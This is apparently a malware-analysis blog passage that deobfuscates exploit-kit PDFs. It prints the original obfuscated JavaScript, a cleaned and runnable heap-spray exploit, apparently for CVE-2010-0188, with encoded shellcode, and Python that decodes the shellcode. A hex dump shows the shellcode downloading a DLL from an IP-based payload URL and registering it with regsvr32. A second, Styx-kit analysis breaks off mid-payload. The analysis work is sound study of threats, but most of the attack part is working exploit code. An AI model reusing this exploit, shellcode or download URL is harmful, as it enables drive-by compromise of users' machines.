*4P**23**4G**^!@#**2O**2B**2M**1L**^!@#**4G**1L**2N**1L**^!@#**2F**2B**2B**2M**^!@#**1L**4G**26**26**^!@#**24**46**4J**2F**^!@#**42**4G**44**2O**^!@#**4J**4M**55**3O**^!@#**4F**4C**4C**29**^!@#**5O**52**49**5O**^!@#**51**4P**23**2B**^!@#**27**4J**4M**55**^!@#**3O**4F**4C**4C**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**28**^!@#**2C**24**26**4B**^!@#**48**4I**3J**4M**^!@#**51**4C**2M**5A**^!@#**4D**52**4L**4A**^!@#**51**4G**4M**4L**^!@#**1L**46**3A**2D**^!@#**23**46**3A**2C**^!@#**27**4J**4C**4L**^!@#**24**58**54**4F**^!@#**4G**4J**4C**23**^!@#**46**3A**2C**29**^!@#**4J**4C**4L**4E**^!@#**51**4F**2N**4J**^!@#**4C**4L**24**46**^!@#**3A**2C**26**2O**^!@#**46**3A**2C**2M**^!@#**4P**4C**51**52**^!@#**4P**4L**1L**46**^!@#**3A**2C**29**5O**^!@#**52**49**5O**51**^!@#**4P**4G**4L**4E**^!@#**23**2B**27**4J**^!@#**4C**4L**24**5A**^!@#**4D**52**4L**4A**^!@#**51**4G**4M**4L**^!@#**1L**46**3A**2E**^!@#**23**46**3A**2C**^!@#**24**58**4P**4C**^!@#**51**2O**22**22**^!@#**2M**4D**4M**4P**^!@#**23**4G**2O**2B**^!@#**2M**4G**2N**46**^!@#**3A**2C**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**2M**4G**26**^!@#**2O**2D**24**58**^!@#**49**2O**46**3A**^!@#**2C**29**5O**52**^!@#**49**5O**51**4P**^!@#**23**4G**27**2D**^!@#**24**2M**4A**2O**^!@#**4N**48**4P**5O**^!@#**4C**3A**4L**51**^!@#**23**49**27**2C**^!@#**2H**24**2M**4P**^!@#**4C**51**26**2O**^!@#**3K**51**4P**4G**^!@#**4L**4E**29**4D**^!@#**4P**4M**4K**34**^!@#**4F**48**4P**34**^!@#**4M**4B**4C**23**^!@#**4A**24**2M**5A**^!@#**4P**4C**51**52**^!@#**4P**4L**1L**4P**^!@#**4C**51**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4H**4G**2C**^!@#**23**46**3A**2C**^!@#**27**46**3A**2F**^!@#**24**58**46**3A**^!@#**2G**2O**22**22**^!@#**2M**4D**4M**4P**^!@#**23**46**3A**2H**^!@#**2O**2B**2M**46**^!@#**3A**2H**2N**46**^!@#**3A**2C**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**2M**46**3A**^!@#**2H**26**26**24**^!@#**58**46**4J**2K**^!@#**2O**46**3A**2F**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**2M**^!@#**46**3A**2I**2O**^!@#**46**3A**2C**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**24**2M**^!@#**46**3A**2J**2O**^!@#**46**3A**2F**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**2O**46**^!@#**4J**2K**24**2M**^!@#**46**3A**2G**26**^!@#**2O**3K**51**4P**^!@#**4G**4L**4E**29**^!@#**4D**4P**4M**4K**^!@#**34**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**23**46**3A**2I**^!@#**45**46**3A**2J**^!@#**24**2M**5A**4P**^!@#**4C**51**52**4P**^!@#**4L**1L**46**3A**^!@#**2G**5A**4D**52**^!@#**4L**4A**51**4G**^!@#**4M**4L**1L**46**^!@#**3A**2K**23**46**^!@#**3A**2H**24**58**^!@#**46**4H**2B**2O**^!@#**46**3A**2H**29**^!@#**51**4M**3K**51**^!@#**4P**4G**4L**4E**^!@#**23**2C**2H**24**^!@#**2M**46**4H**2C**^!@#**2O**46**4H**2B**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**2M**^!@#**46**3A**2G**2O**^!@#**23**46**4H**2C**^!@#**2O**2D**24**3O**^!@#**22**2B**22**26**^!@#**46**4H**2B**2L**^!@#**46**4H**2B**2M**^!@#**4P**4C**51**52**^!@#**4P**4L**1L**46**^!@#**3A**2G**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4H**2D**23**^!@#**46**3A**2C**24**^!@#**58**46**3A**2G**^!@#**2O**22**22**2M**^!@#**4D**4M**4P**23**^!@#**46**3A**2H**2O**^!@#**2B**2M**46**3A**^!@#**2H**2N**46**3A**^!@#**2C**29**4J**4C**^!@#**4L**4E**51**4F**^!@#**2M**46**3A**2H**^!@#**26**2O**2D**24**^!@#**58**46**3A**2G**^!@#**26**2O**22**2O**^!@#**52**22**2M**46**^!@#**3A**2G**26**2O**^!@#**46**3A**2K**23**^!@#**46**3A**2C**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**26**2C**^!@#**24**24**2M**46**^!@#**3A**2G**26**2O**^!@#**46**3A**2K**23**^!@#**46**3A**2C**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**24**24**^!@#**5A**4P**4C**51**^!@#**52**4P**4L**1L**^!@#**46**3A**2G**5A**^!@#**4D**52**4L**4A**^!@#**51**4G**4M**4L**^!@#**1L**46**4H**2E**^!@#**23**24**58**46**^!@#**4H**2F**2O**46**^!@#**4J**2G**23**24**^!@#**2M**4G**4D**23**^!@#**46**4H**2F**2N**^!@#**2K**2B**2B**2B**^!@#**24**58**46**4H**^!@#**2G**2O**22**4M**^!@#**26**52**32**3K**^!@#**4H**4E**4E**4E**^!@#**4I**4N**52**3D**^!@#**2F**33**3C**2A**^!@#**2A**2A**2A**2A**^!@#**54**32**32**32**^!@#**32**33**32**32**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**32**32**3I**32**^!@#**32**32**32**32**^!@#**32**32**32**4D**^!@#**4F**48**32**3K**^!@#**4G**32**4E**4O**^!@#**32**2K**2J**36**^!@#**3A**33**3C**22**^!@#**2M**46**4H**2H**^!@#**2O**46**4J**2C**^!@#**2M**46**4H**2I**^!@#**2O**46**3A**2E**^!@#**23**46**4H**2H**^!@#**24**5A**4C**4J**^!@#**5O**4C**58**46**^!@#**4H**2G**2O**22**^!@#**4I**33**26**32**^!@#**3K**4H**4G**3I**^!@#**4F**36**4N**2K**^!@#**4D**4M**33**3C**^!@#**2A**2A**2A**2A**^!@#**2A**54**32**32**^!@#**32**32**33**32**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**32**32**32**3I**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**4O**55**34**32**^!@#**3K**4G**32**4E**^!@#**4O**32**2A**4D**^!@#**36**2F**33**3C**^!@#**22**2M**46**4H**^!@#**2H**2O**46**4J**^!@#**2D**2M**46**4H**^!@#**2I**2O**46**3A**^!@#**2E**23**46**4H**^!@#**2H**24**5A**46**^!@#**4H**2J**2O**22**^!@#**3K**3M**4I**4O**^!@#**32**35**4E**4E**^!@#**32**32**33**33**^!@#**22**2M**46**4H**^!@#**2K**2O**46**3A**^!@#**2D**23**22**3I**^!@#**3M**37**33**22**^!@#**27**2C**2B**2K**^!@#**2J**2F**24**2M**^!@#**46**4J**4J**2B**^!@#**2O**22**3I**3I**^!@#**4A**32**32**32**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**54**3A**32**^!@#**32**32**32**3I**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**33**32**32**^!@#**32**32**32**54**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**33**32**32**^!@#**32**32**33**4E**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**33**32**32**^!@#**32**32**36**3I**^!@#**36**36**32**32**^!@#**36**32**32**32**^!@#**32**3A**32**32**^!@#**32**32**37**54**^!@#**36**36**32**32**^!@#**36**32**32**32**^!@#**32**54**3A**32**^!@#**32**32**3M**32**^!@#**36**35**32**3E**^!@#**54**32**32**32**^!@#**34**3K**3A**32**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**32**3E**35**32**^!@#**4H**2A**2A**2A**^!@#**2A**2A**22**2M**^!@#**46**4J**4J**2C**^!@#**2O**46**4H**2J**^!@#**26**46**4H**2K**^!@#**26**46**4J**4J**^!@#**2B**26**46**4H**^!@#**2G**2M**46**4J**^!@#**4J**2D**2O**46**^!@#**4H**4G**2C**23**^!@#**46**4H**2I**27**^!@#**22**22**24**2M**^!@#**4G**4D**23**46**^!@#**4J**4J**2D**29**^!@#**4J**4C**4L**4E**^!@#**51**4F**2O**2D**^!@#**24**46**4J**4J**^!@#**2D**26**2O**52**^!@#**4L**4C**5O**4A**^!@#**48**4N**4C**23**^!@#**22**2O**2B**2B**^!@#**22**24**2M**46**^!@#**4J**4J**2E**2O**^!@#**46**4H**2D**23**^!@#**46**4J**4J**2D**^!@#**24**2M**54**4G**^!@#**51**4F**23**58**^!@#**4I**2L**46**4J**^!@#**4J**2E**5A**24**^!@#**46**3A**2B**23**^!@#**4I**24**2M**3A**^!@#**4K**48**4E**4C**^!@#**37**4G**4C**4J**^!@#**4B**2C**29**4P**^!@#**48**54**3N**48**^!@#**4J**52**4C**2O**^!@#**46**4J**4J**2C**^!@#**5A**46**4H**2E**^!@#**23**24**2M';
a=a.replace.apply(a,[/(\^!@#)|(\*)/g,&quot;&quot;]);
s=[];
cc=String;
cc=cc[pp];
tt=event[cc.apply(String,[Ox74,Ox61,Ox72,Ox67,Ox65,Ox74])];
for(i=O;i&lt;a.&#1O8;ength;i+=2){
 s.push(tt[p](a.&#115;ubstr(i,3-1),26)-15);
}
if(tt.info["Authors"]===null){
 k=cc.apply(String,s);
 q="e"+cc.apply(String,[Ox76]);
 q+="al";
 tt[q](&#1O7;);
}
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:O, color:ff8O8O, origin:(O,O), interval:(125OOO,125OOO)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:O?><?templateDesigner Zoom 76?></template>



Lets clean it, run it through node-js and see what comes out:

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = "4c2O6OOfO5178O4a3c2O6OOfOf638O4aa3eb8O4a3O2O824a6e2f8O4a4141414126OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO12398O4a642O6OOfOOO4OOOO4141414141414141" + "OOOO5636d697d3f646366226c6873626d34746761767e6629613d396f6573762f613a31333a36723a3e613a3e613a3e613a33333a32333a3e613a37613d356O7f656175766d662a613a3O333a39613a3b613a38613d3O73766f3O786O7e217f23693O343935333264693135333239316832673934653O3361623162316167323f23693O343935333264693135333239316832673934653O3361623162316167323f24353e25363e2132313e2932313f2f2a3O7474786O7f2a16397646cb1b5a8ac33db1Of698eOa8ef89ceeOe4e8ffffefc98e8O65ffefa6OOa64c57OOf3O874af57OOf3O87431be2ObecO3c384O65ff35cObe38OOa64O65ff35OOa66157Oc584165ffOOa67535OOa6OOa615144Od14488O34O1ca895OO9Od1446cc6c646e25Od1447c4726O777OOd1447c159c338eb8cO65ffOOOOOO8f8635O237d2O28O42447c233327674O42447c37765627424O7ccO42c5d8OOOO1O4Oce1827be2Obeffffff168e8eb88O4c3861ff45d6c6275786OOOOe6f6863eff5O3c38O1e5b8ceb855O591Oc38O5OOOOOOff86O4a6O585OOOOOOOO8e9f2effffff898e955Oa67fb88O86b83fbe693O4733cOd7O8O286b8da35be3c95e5ba5c3Ob84Ob8dd3O8db8cO4245ffce64d8b4cOb866dd3O42e5b8e56e57f1b31fbeO4ad3OdObc1c8O472f83O1ebfObd335c3Odacf14949c335f3OO267b8655f3O875347b8c357b86515c4be9e15574e58424378bf576O93643cO3O4b88bffffO151ee18c233473Oc3e5b866bd338O67b865c1O7b8cOO4b8O3O4b846Oc33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
var _l2 = "4c2O6OOfa5638O4a3c2O6OOf96218O4a9O1f8O4a3O9O844a7d7e8O4a4141414126OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO71888O4a642O6OOfOOO4OOOO4141414141414141" + "OOOO5636d697d3f646366226c6873626d34746761767e6629613d396f6573762f613a31333a36723a3e613a3e613a3e613a33333a32333a3e613a37613d356O7f656175766d662a613a3O333a39613a3b613a38613d3O73766f3O786O7e217f23693O343935333264693135333239316832673934653O3361623162316167323f23693O343935333264693135333239316832673934653O3361623162316167323f24353e25363e2132313e2932313f2f2a3O7474786O7f2a16397646cb1b5a8ac33db1Of698eOa8ef89ceeOe4e8ffffefc98e8O65ffefa6OOa64c57OOf3O874af57OOf3O87431be2ObecO3c384O65ff35cObe38OOa64O65ff35OOa66157Oc584165ffOOa67535OOa6OOa615144Od14488O34O1ca895OO9Od1446cc6c646e25Od1447c4726O777OOd1447c159c338eb8cO65ffOOOOOO8f8635O237d2O28O42447c233327674O42447c37765627424O7ccO42c5d8OOOO1O4Oce1827be2Obeffffff168e8eb88O4c3861ff45d6c6275786OOOOe6f6863eff5O3c38O1e5b8ceb855O591Oc38O5OOOOOOff86O4a6O585OOOOOOOO8e9f2effffff898e955Oa67fb88O86b83fbe693O4733cOd7O8O286b8da35be3c95e5ba5c3Ob84Ob8dd3O8db8cO4245ffce64d8b4cOb866dd3O42e5b8e56e57f1b31fbeO4ad3OdObc1c8O472f83O1ebfObd335c3Odacf14949c335f3OO267b8655f3O875347b8c357b86515c4be9e15574e58424378bf576O93643cO3O4b88bffffO151ee18c233473Oc3e5b866bd338O67b865c1O7b8cOO4b8O3O4b846Oc33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
//_l3 = app; @malforsec not needed
_l4 = new Array();

function _l5() {
//    var _l6 = _l3.viewerVersion.toString();
    var _l6 = "9.3.O"; //@malforsec set viewer version
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += 'O';
    return parseInt(_l6, 1O)
}
function _l7(_l8, _l9) {
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(O, _l9 / 2)
}
function _IO(_I1) {
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9O9O');
    spray = _l7(dakRote, Ox2OOO - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524O98);
    for (i = O; i < 4OO; i++) _l4[i] = loxWhee.substr(O, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len) {
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(O, len)
}
function _I3(_I1) {
    ret = '';
    for (i = O; i < _I1.length; i += 2) {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4) {
    _I5 = '';
    for (_I6 = O; _I6 < _I1.length; _I6++) {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6) {
    _jO = _I6.toString(16);
    _j1 = _jO.length;
    _I5 = (_j1 % 2) ? 'O' + _jO : _jO;
    return _I5
}
function _j2(_I1) {
    _I5 = '';
    for (_I6 = O; _I6 < _I1.length; _I6 += 2) {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3() {
    _j4 = _l5();
    if (_j4 < 9OOO) {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    } else {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 1O984);
    _llO = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _llO + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%OO');
    _ll3 = _j2(_ll2);
    with({
        k: _ll3
    }) _IO(k);
//    ImageField1.rawValue = _ll1
    console.log(_ll1); //@malforsec log result
}
_j3();



Thats better! Looks like shellcode in the middle there.

3. Shellcode


Some magic is performed by these dark agents, or should we call them Dark Knights. Lets see if we can do just as good as King Arthur and see if we too can pass over the bridge when meeting The Dark Knight  (youtube - warning not for sensitive people).

Short Python intermesso: Just concatenating the strings from the JavaScript code. Last string reversed. Output the chars to get bin code.


>>> hexstr = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + "00005636d697d3f646366226c6873626d34746761767e6629613d396f6573762f613a31333a36723a3e613a3e613a3e613a33333a32333a3e613a37613d35607f656175766d662a613a30333a39613a3b613a38613d3073766f3078607e217f23693034393533326469313533323931683267393465303361623162316167323f23693034393533326469313533323931683267393465303361623162316167323f24353e25363e2132313e2932313f2f2a30747478607f2a16397646cb1b5a8ac33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c384065ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446cc6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c233327674042447c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f6863eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b83fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e56e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b86515c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c004b80304b8460c33f59e43574e58cfcf4e3866"[::-1]
>>> hexbytes = "".join(chr(int(hexstr[i:i+2],16)) for i in xrange(0,len(hexstr),2))
>>> hexbytes
'L `\x0f\x05\x17\x80J< `\x0f\x0fc\x80J\xa3\xeb\x80J0 \x82Jn/\x80JAAAA&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x129\x80Jd `\x0f\x00\x04\x00\x00AAAAAAAAf\x83\xe4\xfc\xfc\x85\xe4u4\xe9_3\xc0d\x8b@0\x8b@\x0c\x8bp\x1cV\x8bv\x083\xdbf\x8b^<\x03t3,\x81\xee\x15\x10\xff\xff\xb8\x8b@0\xc3F9\x06u\xfb\x874$\x85\xe4uQ\xe9\xebLQV\x8bu<\x8bt5x\x03\xf5V\x8bv \x03\xf53\xc9IA\xfc\xad\x03\xc53\xdb\x0f\xbe\x108\xf2t\x08\xc1\xcb\r\x03\xda@\xeb\xf1;\x1fu\xe6^\x8b^$\x03\xddf\x8b\x0cK\x8dF\xec\xffT$\x0c\x8b\xd8\x03\xdd\x8b\x04\x8b\x03\xc5\xab^Y\xc3\xebS\xad\x8bh \x80}\x0c3t\x03\x96\xeb\xf3\x8bh\x08\x8b\xf7j\x05Y\xe8\x98\xff\xff\xff\xe2\xf9\xe8\x00\x00\x00\x00XPj@h\xff\x00\x00\x00P\x83\xc0\x19PU\x8b\xec\x8b^\x10\x83\xc3\x05\xff\xe3hon\x00\x00hurlmT\xff\x16\x83\xc4\x08\x8b\xe8\xe8a\xff\xff\xff\xeb\x02\xebr\x81\xec\x04\x01\x00\x00\x8d\\$\x0c\xc7\x04$regs\xc7D$\x04vr32\xc7D$\x08 -s Sh\xf8\x00\x00\x00\xffV\x0c\x8b\xe83\xc9Q\xc7D\x1d\x00wpbt\xc7D\x1d\x05.dll\xc6D\x1d\t\x00Y\x8a\xc1\x040\x88D\x1d\x04AQj\x00j\x00SWj\x00\xffV\x14\x85\xc0u\x16j\x00S\xffV\x04j\x00\x83\xeb\x0cS\xffV\x04\x83\xc3\x0c\xeb\x02\xeb\x13G\x80?\x00u\xfaG\x80?\x00u\xc4j\x00j\xfe\xffV\x08\xe8\x9c\xfe\xff\xff\x8eN\x0e\xec\x98\xfe\x8a\x0e\x89o\x01\xbd3\xca\x8a[\x1b\xc6Fy6\x1a/phttp://129.121.65.54/27aa2a2ac05d97b8a923519db359409c/27aa2a2ac05d97b8a923519db359409c/q.php?fsp=1h:1k:1i:30:1j&mfuqeope=1g:1n:32:33:1n:1n:1n:2v:31:1o&suoi=1i&nvqgdt=bcxlb&cdo=ymce\x00\x00'



Looks like we got some nice bin code out, and we even got straight to The Holy Grai.. - eehhm payload URL.

4. Payload URL


lets look at the code in hex - ascii format


0000000: 4c20 600f 0517 c280 4a3c 2060 0f0f 63c2  L `.....J< `..c.
0000010: 804a c2a3 c3ab c280 4a30 20c2 824a 6e2f  .J......J0 ..Jn/
0000020: c280 4a41 4141 4126 0000 0000 0000 0000  ..JAAAA&........
0000030: 0000 0000 0000 0012 39c2 804a 6420 600f  ........9..Jd `.
0000040: 0004 0000 4141 4141 4141 4141 66c2 83c3  ....AAAAAAAAf...
0000050: a4c3 bcc3 bcc2 85c3 a475 34c3 a95f 33c3  .........u4.._3.
0000060: 8064 c28b 4030 c28b 400c c28b 701c 56c2  .d..@0..@...p.V.
0000070: 8b76 0833 c39b 66c2 8b5e 3c03 7433 2cc2  .v.3..f..^<.t3,.
0000080: 81c3 ae15 10c3 bfc3 bfc2 b8c2 8b40 30c3  .............@0.
0000090: 8346 3906 75c3 bbc2 8734 24c2 85c3 a475  .F9.u....4$....u
00000a0: 51c3 a9c3 ab4c 5156 c28b 753c c28b 7435  Q....LQV..u<..t5
00000b0: 7803 c3b5 56c2 8b76 2003 c3b5 33c3 8949  x...V..v ...3..I
:
0000130: 6a05 59c3 a8c2 98c3 bfc3 bfc3 bfc3 a2c3  j.Y.............
0000140: b9c3 a800 0000 0058 506a 4068 c3bf 0000  .......XPj@h....
0000150: 0050 c283 c380 1950 55c2 8bc3 acc2 8b5e  .P.....PU......^
0000160: 10c2 83c3 8305 c3bf c3a3 686f 6e00 0068  ..........hon..h
0000170: 7572 6c6d 54c3 bf16 c283 c384 08c2 8bc3  urlmT...........
0000180: a8c3 a861 c3bf c3bf c3bf c3ab 02c3 ab72  ...a...........r
0000190: c281 c3ac 0401 0000 c28d 5c24 0cc3 8704  ..........\$....
00001a0: 2472 6567 73c3 8744 2404 7672 3332 c387  $regs..D$.vr32..
00001b0: 4424 0820 2d73 2053 68c3 b800 0000 c3bf  D$. -s Sh.......
00001c0: 560c c28b c3a8 33c3 8951 c387 441d 0077  V.....3..Q..D..w
00001d0: 7062 74c3 8744 1d05 2e64 6c6c c386 441d  pbt..D...dll..D.
00001e0: 0900 59c2 8ac3 8104 30c2 8844 1d04 4151  ..Y.....0..D..AQ
00001f0: 6a00 6a00 5357 6a00 c3bf 5614 c285 c380  j.j.SWj...V.....
0000200: 7516 6a00 53c3 bf56 046a 00c2 83c3 ab0c  u.j.S..V.j......
0000210: 53c3 bf56 04c2 83c3 830c c3ab 02c3 ab13  S..V............
0000220: 47c2 803f 0075 c3ba 47c2 803f 0075 c384  G..?.u..G..?.u..
0000230: 6a00 6ac3 bec3 bf56 08c3 a8c2 9cc3 bec3  j.j....V........
0000240: bfc3 bfc2 8e4e 0ec3 acc2 98c3 bec2 8a0e  .....N..........
0000250: c289 6f01 c2bd 33c3 8ac2 8a5b 1bc3 8646  ..o...3....[...F
0000260: 7936 1a2f 7068 7474 703a 2f2f 3132 392e  y6./phttp://129.
0000270: 3132 312e 3635 2e35 342f 3237 6161 3261  121.65.54/27aa2a
0000280: 3261 6330 3564 3937 6238 6139 3233 3531  2ac05d97b8a92351
0000290: 3964 6233 3539 3430 3963 2f32 3761 6132  9db359409c/27aa2
00002a0: 6132 6163 3035 6439 3762 3861 3932 3335  a2ac05d97b8a9235
00002b0: 3139 6462 3335 3934 3039 632f 712e 7068  19db359409c/q.ph
00002c0: 703f 6673 703d 3168 3a31 6b3a 3169 3a33  p?fsp=1h:1k:1i:3
00002d0: 303a 316a 266d 6675 7165 6f70 653d 3167  0:1j&mfuqeope=1g
00002e0: 3a31 6e3a 3332 3a33 333a 316e 3a31 6e3a  :1n:32:33:1n:1n:
00002f0: 316e 3a32 763a 3331 3a31 6f26 7375 6f69  1n:2v:31:1o&suoi
0000300: 3d31 6926 6e76 7167 6474 3d62 6378 6c62  =1i&nvqgdt=bcxlb
0000310: 2663 646f 3d79 6d63 6500 000a            &cdo=ymce...




Yes we got the url rgiht. So if we where after that we could now just fetch it...

5. Epilogue


Feels good to be on the same side as King Arthur and to be able to reverse and deobfuscate the Black(hole) Knights evi(a)l doings. And get our hands on The Holy Grail.

PS: running the shellcode with sctest and rasm failed with errors due to buffer overflow - any tip on how to get around that very much appreciated



Happy Blackhole PDF deobfuscation :)

Friday, April 12, 2013

Styx analysis - a peek inside the CVE-2010-0188 PDF



Back to the PDF I fetched from the Styx EK  the other day. Lets see what it got inside.

1. Overview of the XwYBSGiPQ.pdf

pdfid gives us an overview:

Lets fire up pyew:


Lets look at that stream:



pdfextract dumps objects, streams, scripts and so on for us:

$pdfextract XwYBSGiPQ.pdf

Nothing else but that stream we saw dumped.

2. Details of the PDF stream


<?xml version="1.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf>
<version>1.65</version><interactive>1</interactive><linearized>1</linearized></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present></config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="ASsQulJ">
    <pageSet>
        <pageArea id="zUgwaCv" name="zUgwaCv">
            <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
            <medium long="792pt" short="612pt" stock="default"/>
  </pageArea>
 </pageSet>
    <subform h="756pt" w="576pt" name="XgNBk">
        <field h="56mm" name="pgGzgu" w="85mm" x="53.6501mm" y="88.6499mm">
            <event activity="initialize" name="CQIkirHu">
                <script contentType="application/x-javascript">
                    var ZFDIxkYBA = 370;
ZFDIxkYBA+=10;



fGRdP=&quot;&quot;;
dTuOAK='MfSisX';if (dTuOAK=='Wbsid') Qqlxr();var xxnz='qxhn';

WDpZj = &quot;f\n\n noitcnusabocne_46e(ed\n{ )atad   46b rav  = GFEDCBA\&quot;JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v    \n;\&quot; ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i     ca     0 =      \n,e  ,\&quot;\&quot; = cn  \nmt      a_p;][ = rr\n \n{ od      \n1o       = ahc.atadoCr++i(tAed\n;)         2oc.atad =rahi(tAedoC)++      \n;o  atad = 3hc.tAedoCra+i(  \n \n;)+    stib   o = 61 &lt;&lt; 1o || 8 &lt;&lt; 23o     \n \n;   ib = 1h  st &amp; 81 &gt;&gt;3x0     \n;f   tib = 2h&gt; s0 &amp; 21 &gt;f3x      \n;h  stib = 3&gt;&gt; 3x0 &amp; 6 \n;f         4h&amp; stib =x0    \n\n;f3   ra_pmt  a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA   elihw } i( .atad &lt; nel\n \n;)htg   t = cne _pmnioj.rra''(   \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav   _pppa = revv.preVreweioisirtSot.n(gna    \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw   pa(el.rev_ptgn\n{)4 &lt; h   ppa     ev_'0' =+ r \n;er\t\n}   rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y  \n(elihw  dobhtgnel.y &lt;   \n{)nel    ydob    =+  \n;ydob}  ter    \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf =  + x\\30=h&amp;\&quot;\&quot;00llehs\t\n; = 